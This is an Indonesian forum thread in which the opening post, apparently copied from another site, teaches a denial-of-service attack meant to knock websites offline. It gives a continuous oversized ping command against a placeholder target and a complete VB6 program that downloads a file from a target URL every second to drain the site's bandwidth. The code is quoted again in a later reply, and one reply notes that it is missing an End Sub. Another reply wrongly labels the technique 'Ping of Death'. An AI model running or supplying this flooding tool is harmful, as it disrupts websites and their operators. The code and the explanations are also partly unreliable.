Username Password

Register Here || Lost Password
View Thread
Explore Your Brain » Pemrograman » Visual Basic
Teknik DOS pake vb 6
Username
Password
Register FAQ Members List Today's Posts Search

Print Thread

17-10-2008 09:52 PM Teknik DOS pake vb 6
User Avatar

chandra_rock22
Chunnin Senior


Posts: 111
Joined: 08.07.08
Location: Medan, Sumatra Utara
Age: 30
Teknik DOS disini maksudnya yaitu untuk melumpuhkan suatu server/website dengan cara menghabiskan bandwitdh dari website tersebut. Ada beberapa cara untuk DDOS, misalnya paling gampang dengan menggunakan perintah "ping", misalnya seperti : "ping -l 65500 - t www.target.com". Dari perintah "ping" tersebut kita mengirim paket sebesar 65500 bytes ke server dan nilai tersebut merupakan nilai maksimum yang dapat kita kirim. Meskipun perintah tersebut menggunakan paramameter "-t" yang berarti perintah "ping" akan dilakukan terus menerus ke "www.target.com", tetapi sepertinya butuh ratusan/ribuan komputer yang diperlukan untuk menjalani perintah "ping" ini seharian sehingga bandwidth dari si server habis.


Oleh karena hanya "65500", maka saya mikir bagaimana ya cara cepat menyedot bandwitdh dari si server. Berhubung perintah "ping" ga bisa, saya coba liat2 VB6, yup ada perintah : "Declare Function URLDownloadToFile Lib "urlmon" Alias "URLDownloadToFileA" (ByVal pCaller As Long, ByVal szURL As String, ByVal szFileName As String, ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long".

Setelah mencoba2, perintah tersebut dapat mendownload satu halaman/file dan mengsave file tsb ke harddisk. Wah klo file yang berukuran gede didownload make looping kayaknya bakalan nyedot bandwidth si server banyak tuh

Dengan konsep tersebut, yuk mari yuk mulai coding make VB6.
Yang diperlukan :
- l textBox => Text1
- 2 button, => Command1 dan Command2
- 1 timer => Timer1
- tambah sendiri yang lain

Kode-kode (taruh di form):

'----------START----------START----------
'fungsi buat mendownload file
Private Declare Function URLDownloadToFile Lib "urlmon" Alias "URLDownloadToFileA" (ByVal pCaller As Long, ByVal szURL As String, ByVal szFileName As String, ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long
'fungsi untuk mendapatkan folder temporary
Private Declare Function GetTempPath Lib "kernel32" Alias "GetTempPathA" (ByVal nBufferLength As Long, ByVal lpBuffer As String) As Long

'Saat program dijalankan make sure nothing happen
Private Sub Form_Load()
Timer1.Enabled = False
End Sub

'fungsi untuk menggenerate tulisan menjadi acak
Public Function Random(ByVal Low As Long, ByVal High As Long) As Long
Randomize
Random = Int((High - Low + 1) * Rnd) + Low
End Function

'fungsi untuk mendapatkan folder temporary
Public Function GetTempDir() As String
Dim buff As String
buff = String(255, Chr$(0))
GetTempPath Len(buff), buff
GetTempDir = Left(buff, InStr(1, buff, Chr(0), vbTextCompare) - 1)
End Function

'inti dari program untuk melakukan DDOS
Private Sub Timer1_Timer()
Dim fileName As String
Dim DDOS
'membuat nama acak sebagai nama file yang akan disave
fileName = GetTempDir & Random(0, 999999999)
'mulai mendownload file yang terdapat pada Text1 dan mengsavenya
DDOS = URLDownloadToFile(0, Text1.text, fileName , 0 ,0)

'tombol untuk memulai DDOS
Private Sub Command1_Click()
Timer1.Enabled = True 'hidupkan timer buat looping
Timer1.Interval = 1000 'set setiap 1 detik program mendownload file dari server
Command2.Enabled = True
Command1.Enabled = False
End Sub

'stop semua actions
Private Sub Command2_Click()
Timer1.Enabled = False
Command1.Enabled = True
Command2.Enabled = False
End Sub
'----------END----------END----------

Setelah semua komponen2 dan kode sudah ada maka jalankan / F5, kemudian isi
textbox dengan website yang akan diDDOS, misalnya "http://target.com/download/setup.exe"
atau "http://target.com/index.php" , ingat tanpa tanda kutip dan TIDAK pake "www".
Jadi klo kita isi "www.target.com/index.php" <== SALAH!. Setelah itu pencet command1 untuk memulai serangan.
Saat command1 dipencet, maka program otomatis mendownload file di website
sesuai yang kita isi di textbox dan mengsavenya di folder temporay dengan nama acak.
kenapa pake nama acak? karena untuk mengantisipasi jika
suatu file blum beres didownload maka ga akan ngeganggu proses lain yang sedang berlangsung.
Ok kayaknya udah pada paham tentang source code di atas.
Ya tentunya bisa nambahin sendiri seperti pengecekan ada tidaknya koneksi internet,
size yang udah didonlot atau animasi loading pada program biar lebih ok lagi programnya.
Diambil Dari vb-bego.com
Terus Cari Ilmu Demi Sesuap Nasi
 
  x 1
Offline
18-10-2008 05:49 AM RE: Teknik DOS pake vb 6
User Avatar

EVA-00
HackAge


Posts: 2770
Joined: 21.05.08
Location: Wallahu a'lam
Age: 33
Thanks bgt tuk infonya, serangan ini sering disebut dengan "Ping of Death" Serangan yang mengirim paket permintaan echo ICMP berukuran terlalu besar (PING) dengan tujuan membuat buffer masukan pada mesin tujuan mengalami kelebihan beban dan akhirnya membuat mesin tersebut macet.

Oia bro, programnya udah lu buat blm??? kl udah lu buat tolong di share sekalian yah...
Nabi Muhammad SAW bersabda :” Barangsiapa Yang Mengamalkan Ilmu Yang Ia Ketahui Maka Allah Akan Memberikan Kepadanya Ilmu Yang Belum Ia Ketahui” (HR. Imam Ahmad).

..::shn6 u!vJq Jnoh 3Joldx3 d33>I::..
 
  x 1
Offline
18-10-2008 05:53 AM RE: Teknik DOS pake vb 6
User Avatar

luv_you
Anbu


Posts: 251
Joined: 03.07.08
Location: jakarta raya
seru nih kyknya thx atas infonya....
 
Offline
19-10-2008 01:44 AM RE: Teknik DOS pake vb 6
User Avatar

chandra_rock22
Chunnin Senior


Posts: 111
Joined: 08.07.08
Location: Medan, Sumatra Utara
Age: 30
hehehehe.....
tu mah aq cuma ambil dari vb-bego
tentang program nya blum aq buat...
tapi tenang aja
entar aq buatin...
doain biar jgn debug
WinkWinkWinkWinkWink
Terus Cari Ilmu Demi Sesuap Nasi
 
Offline
21-10-2008 06:50 PM RE: Teknik DOS pake vb 6
User Avatar

udahjadi
Jounin Spesial


Posts: 220
Joined: 29.08.08
Location: JakTOWN®
Age: 39
mantab nich... tapi sayang gw gak ngerti Angry

thanxs yach
Newbie™
Merdeka Indonesia...Maju terus...!!!
jangan mau kalah dari negara lain !!!
 
Offline
28-10-2008 02:38 AM RE: Teknik DOS pake vb 6
User Avatar

Bledek_82
Murid Akademi II


Posts: 22
Joined: 28.10.08
Location: Blitar
Age: 37
sip Grin
semua PERISTIWA pasti ada HIKMAHnya
 
Offline
31-10-2008 08:26 AM RE: Teknik DOS pake vb 6
User Avatar

Aish
Jounin Spesial


Posts: 243
Joined: 30.09.08
Location: Jakarta yg sumpek
Age: 34
Buat si cantik miyabi pake vb bisa gak ya Pfft
 
Offline
31-10-2008 09:53 PM RE: Teknik DOS pake vb 6
User Avatar

k4nd4
Murid Akademi I


Posts: 4
Joined: 30.10.08
Location: Jakarta
Age: 33
thank's bro, entr gw coba dech?
sekalian buat referensi gw...Wink

 
Offline
05-11-2008 05:23 AM RE: Teknik DOS pake vb 6
User Avatar

satria_sexy
Murid Akademi I


Posts: 4
Joined: 09.08.08
Location: awang-awang
udahjadi tulis:
mantab nich... tapi sayang gw gak ngerti Angry

thanxs yach



jiakakakakakak.....sama bro gw juga gak ngerti Shock
 
Offline
08-07-2009 03:55 AM RE: Teknik DOS pake vb 6
User Avatar

andi
Jounin


Posts: 160
Joined: 05.03.09
Location: blacknet
Age: 31
artikelnya lumayan..
aku baru tahu ternyat dos bisa pake vb 6.0

Apaansich
 
Offline
19-09-2009 06:49 PM RE: Teknik DOS pake vb 6
User Avatar

Boolean
Murid Akademi I


Posts: 11
Joined: 19.09.09
Location: Cybernetic Hell
Age: 53
yang di post ama chandra_rock22 tu apa mang harus dari VB ya? logikanya semua tu kan tinggal ketik langsung dari CMD atau bisa juga via TELNET (klasik y hehehe)... napa repot2 dari VB segala? maaf tp Q pengen tau alasannya tuh... (penasaran neh.. hehehe) Peace
Dracoola There's only two choices....
 
Offline
29-10-2009 09:59 PM RE: Teknik DOS pake vb 6
User Avatar

B4NK4I
Murid Akademi I


Posts: 8
Joined: 29.10.09
Wah, thank's gan infonya. Goodjob Sangat membantu sekali buat gw. Huehue
 
Offline
15-11-2009 01:24 AM RE: Teknik DOS pake vb 6
User Avatar

tamie
Murid Akademi I


Posts: 1
Joined: 15.11.09
Thanks for all the information. I needed this for my assignment.



Regards,
Tamie
Placement financier
 
Offline
18-11-2009 05:01 AM RE: Teknik DOS pake vb 6
User Avatar

ayam-kalkun
Anbu


Posts: 381
Joined: 20.05.09
Location: /etc/ExploreYourBrain
Age: 26
gw coba dulu bro kudu donlot program vb6 lagi dah .. kompi gw abis di install ulang ama temen gw soalnya ...huhuhuh
Barangsiapa mengajarkan ilmu, maka baginya pahala seperti orang yang mengamalkan ilmu nya dan tidak akan mengurangi pahala orang yang melakukan amal tersebut.
 
Offline
14-02-2010 08:45 PM RE: Teknik DOS pake vb 6
User Avatar

Pabenk
Murid Akademi I


Posts: 1
Joined: 14.02.10
chandra_rock22 wrote:
Teknik DOS disini maksudnya yaitu untuk melumpuhkan suatu server/website dengan cara menghabiskan bandwitdh dari website tersebut. Ada beberapa cara untuk DDOS, misalnya paling gampang dengan menggunakan perintah "ping", misalnya seperti : "ping -l 65500 - t www.target.com". Dari perintah "ping" tersebut kita mengirim paket sebesar 65500 bytes ke server dan nilai tersebut merupakan nilai maksimum yang dapat kita kirim. Meskipun perintah tersebut menggunakan paramameter "-t" yang berarti perintah "ping" akan dilakukan terus menerus ke "www.target.com", tetapi sepertinya butuh ratusan/ribuan komputer yang diperlukan untuk menjalani perintah "ping" ini seharian sehingga bandwidth dari si server habis.


Oleh karena hanya "65500", maka saya mikir bagaimana ya cara cepat menyedot bandwitdh dari si server. Berhubung perintah "ping" ga bisa, saya coba liat2 VB6, yup ada perintah : "Declare Function URLDownloadToFile Lib "urlmon" Alias "URLDownloadToFileA" (ByVal pCaller As Long, ByVal szURL As String, ByVal szFileName As String, ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long".

Setelah mencoba2, perintah tersebut dapat mendownload satu halaman/file dan mengsave file tsb ke harddisk. Wah klo file yang berukuran gede didownload make looping kayaknya bakalan nyedot bandwidth si server banyak tuh

Dengan konsep tersebut, yuk mari yuk mulai coding make VB6.
Yang diperlukan :
- l textBox => Text1
- 2 button, => Command1 dan Command2
- 1 timer => Timer1
- tambah sendiri yang lain

Kode-kode (taruh di form):

'----------START----------START----------
'fungsi buat mendownload file
Private Declare Function URLDownloadToFile Lib "urlmon" Alias "URLDownloadToFileA" (ByVal pCaller As Long, ByVal szURL As String, ByVal szFileName As String, ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long
'fungsi untuk mendapatkan folder temporary
Private Declare Function GetTempPath Lib "kernel32" Alias "GetTempPathA" (ByVal nBufferLength As Long, ByVal lpBuffer As String) As Long

'Saat program dijalankan make sure nothing happen
Private Sub Form_Load()
Timer1.Enabled = False
End Sub

'fungsi untuk menggenerate tulisan menjadi acak
Public Function Random(ByVal Low As Long, ByVal High As Long) As Long
Randomize
Random = Int((High - Low + 1) * Rnd) + Low
End Function

'fungsi untuk mendapatkan folder temporary
Public Function GetTempDir() As String
Dim buff As String
buff = String(255, Chr$(0))
GetTempPath Len(buff), buff
GetTempDir = Left(buff, InStr(1, buff, Chr(0), vbTextCompare) - 1)
End Function

'inti dari program untuk melakukan DDOS
Private Sub Timer1_Timer()
Dim fileName As String
Dim DDOS
'membuat nama acak sebagai nama file yang akan disave
fileName = GetTempDir & Random(0, 999999999)
'mulai mendownload file yang terdapat pada Text1 dan mengsavenya
DDOS = URLDownloadToFile(0, Text1.text, fileName , 0 ,0)

'tombol untuk memulai DDOS
Private Sub Command1_Click()
Timer1.Enabled = True 'hidupkan timer buat looping
Timer1.Interval = 1000 'set setiap 1 detik program mendownload file dari server
Command2.Enabled = True
Command1.Enabled = False
End Sub

'stop semua actions
Private Sub Command2_Click()
Timer1.Enabled = False
Command1.Enabled = True
Command2.Enabled = False
End Sub
'----------END----------END----------

Setelah semua komponen2 dan kode sudah ada maka jalankan / F5, kemudian isi
textbox dengan website yang akan diDDOS, misalnya "http://target.com/download/setup.exe"
atau "http://target.com/index.php" , ingat tanpa tanda kutip dan TIDAK pake "www".
Jadi klo kita isi "www.target.com/index.php" <== SALAH!. Setelah itu pencet command1 untuk memulai serangan.
Saat command1 dipencet, maka program otomatis mendownload file di website
sesuai yang kita isi di textbox dan mengsavenya di folder temporay dengan nama acak.
kenapa pake nama acak? karena untuk mengantisipasi jika
suatu file blum beres didownload maka ga akan ngeganggu proses lain yang sedang berlangsung.
Ok kayaknya udah pada paham tentang source code di atas.
Ya tentunya bisa nambahin sendiri seperti pengecekan ada tidaknya koneksi internet,
size yang udah didonlot atau animasi loading pada program biar lebih ok lagi programnya.
Diambil Dari vb-bego.com


dah gw copas sintag nya,,tetapi gak mau jaln,,kalu di run d Vb ???bgaiamn cara input nya bro???
 
Offline
24-10-2010 08:07 AM RE: Teknik DOS pake vb 6
User Avatar

3may
Murid Akademi I


Posts: 10
Joined: 01.07.09

Deprecated: Function eregi() is deprecated in /home/explnorg/public_html/includes/bbcodes/code_bbcode_include.php on line 24

Deprecated: preg_replace(): The /e modifier is deprecated, use preg_replace_callback instead in /home/explnorg/public_html/includes/bbcodes/code_bbcode_include.php on line 29
iseng2 nyoba and copas ke vb and masih da errornya

coba perhatiin code berikut

Download source  Code

'inti dari program untuk melakukan DDOS
Private Sub Timer1_Timer()
Dim fileName As String
Dim DDOS
'membuat nama acak sebagai nama file yang akan disave
fileName = GetTempDir & Random(0, 999999999)
'mulai mendownload file yang terdapat pada Text1 dan mengsavenya
DDOS = URLDownloadToFile(0, Text1.text, fileName , 0 ,0)

'tombol untuk memulai DDOS
Private Sub Command1_Click()
Timer1.Enabled = True 'hidupkan timer buat looping
Timer1.Interval = 1000 'set setiap 1 detik program mendownload file dari server
Command2.Enabled = True
Command1.Enabled = False
End Sub





Private Sub Timer1_Timer()
tidak ada
end sub
nya
 
  x 1
Offline
25-10-2010 03:04 AM RE: Teknik DOS pake vb 6
User Avatar

aldyhacker
Murid Akademi I


Posts: 6
Joined: 14.10.10
Age: 19
iyah....serangan pink of death
 
Offline
25-10-2010 03:05 AM RE: Teknik DOS pake vb 6
User Avatar

aldyhacker
Murid Akademi I


Posts: 6
Joined: 14.10.10
Age: 19
di atas itu VB-DOTnet yah???
 
Offline
Jump to Forum:
Forum powered by fusionBoard
Share this Thread
URL:
BBcode:
HTML:
Similar Threads
Thread Forum Replies Last Post
eBook Teknik Membaca Cepat (Speed Reading For Beginners) E-Book 25 29-07-2012 07:40
rombong username & password pake CAIN & ABLE Software 10 08-07-2011 19:41
E-Book Teknik Programming E-Book 1 22-03-2011 18:14
Teknik Cracking Software Berbasiskan Microsoft Access E-Book 1 20-02-2011 22:04
bisa ga' pake 3 booting ???... Out Of Topic 3 18-02-2011 08:56
Copyright © 2007-2016